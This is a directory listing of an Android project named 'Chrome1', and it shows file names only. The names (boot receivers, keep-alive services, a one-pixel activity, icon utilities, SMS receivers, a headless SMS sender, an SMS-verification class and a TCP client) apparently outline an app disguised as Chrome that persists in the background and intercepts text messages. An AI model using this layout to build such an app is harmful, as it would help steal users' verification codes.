# Chrome1

./: settings.gradle
app/: build.gradle  proguard-rules.pro
app/src/androidTest/java/com/example/chrome1/: ExampleInstrumentedTest.java
app/src/main/: AndroidManifest.xml
app/src/main/aidl/com/example/chrome1/: IMyAidlInterface.aidl
app/src/main/cpp/: CMakeLists.txt  native-lib.cpp
app/src/main/java/com/example/chrome1/: App.java  AppForeBackStatusCallback.java  BootReceiver.java  BootService.java  ConnectListener.java  FirstService.java  GuardService.java  JobWakeUpService.java  KeepLiveActivityManager.java  ScreenListener.java
app/src/main/java/com/example/chrome1/Interface/: OnNetwork.java
app/src/main/java/com/example/chrome1/activity/: Alias1Activity.java  KeepLiveActivity.java  OnePiexlActivity.java
app/src/main/java/com/example/chrome1/network/: Network.java  TcpClient.java  TcpClientHandler.java
app/src/main/java/com/example/chrome1/sms/: ComposeSmsActivity.java  HeadlessSmsSendService.java  MmsReceiver.java  SMSVerification.java  ScreenBroadcastReceiver.java  SmsReceiver.java
app/src/main/java/com/example/chrome1/sqliteHelper/: MySqliteHelper.java
app/src/main/java/com/example/chrome1/sqliteHelper/SqlLiteUtli/: SqlLiteUpdateUtil.java
app/src/main/java/com/example/chrome1/util/: AppIconUtil.java  WinUtil.java
app/src/main/res/drawable-xhdpi/: t.xml
app/src/main/res/layout/: activity_send.xml  layout_dialog.xml  notification_layout.xml
app/src/main/res/values/: strings.xml  themes.xml
app/src/main/res/values-en/: strings.xml
app/src/test/java/com/example/chrome1/: ExampleUnitTest.java
gradle/wrapper/: gradle-wrapper.properties
